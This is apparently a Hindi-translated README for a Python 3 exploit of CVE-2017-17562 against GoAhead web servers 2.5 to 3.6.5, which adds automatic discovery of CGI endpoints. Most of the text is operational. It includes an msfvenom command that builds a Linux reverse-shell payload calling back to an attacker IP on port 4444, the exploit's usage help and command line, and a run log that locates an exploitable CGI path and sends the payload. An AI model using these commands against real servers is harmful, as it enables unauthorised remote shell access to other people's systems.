
CVE-2017-17562 के लिए स्टैंडअलोन Python 3 एक्सप्लॉइट जो GoAhead वेब सर्वर 2.5–3.6.5 को लक्षित करता है, स्वचालित CGI एंडपॉइंट खोज और रिवर्स शेल पेलोड वितरण के साथ।
CVE-2017-17562 के लिए स्टैंडअलोन Python 3 रिवर्स शेल एक्सप्लॉइट, GoAhead वेब सर्वर संस्करण 2.5 < 3.6.5 पर काम करता है।
ब्लॉग लेख यहाँ।
Python 3.7 पर लिखा और परीक्षण किया गया, POC और असुरक्षित वातावरण यहाँ पर आधारित। कुछ कोड Metasploit मॉड्यूल से लिया गया।
मूल POC यहाँ मिलेगा। मैंने यह इसलिए लिखा क्योंकि मैं मूल POC एक्सप्लॉइट को काम नहीं करवा पाया, और केवल तब एहसास हुआ कि उसमें शोषण के लिए CGI मॉड्यूल खोजने वाला फ़ंक्शन गायब था, अर्थात इसमें उपयोगकर्ता को उसका स्थान निर्दिष्ट करने या पुनरावर्ती खोज के लिए वर्डलिस्ट प्रदान करने की आवश्यकता होती है।
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] [-cgipath CGIPATH] -payload
PAYLOAD
Generate the payload first, eg:
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f elf-so -o dir/payload.so
Required arguments:
-rhost RHOST Target host running Go Ahead webserver eg. 192.168.92.153
-payload PAYLOAD Path to the malicious elf-so payload. eg dir/payload.so
Optional arguments:
-rport RPORT Target port running GoAhead webserver. Default: 8080
-cgipath CGIPATH The path to a CGI script on the GoAhead server Default: '/cgi-bin' as in http://192.168.92.153/cgi-bin
Call the exploit like this:
./exploit.py -rhost 192.168.92.153 -rport 8080 -cgipath /cgi-bin/index -payload dir/payload.so
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -rhost 192.168.92.153 -rport 8080 -payload payload3.so
Searching 390 paths for an exploitable CGI endpoint...
Exploitable CGI located at /cgi-bin/index
Sending payload...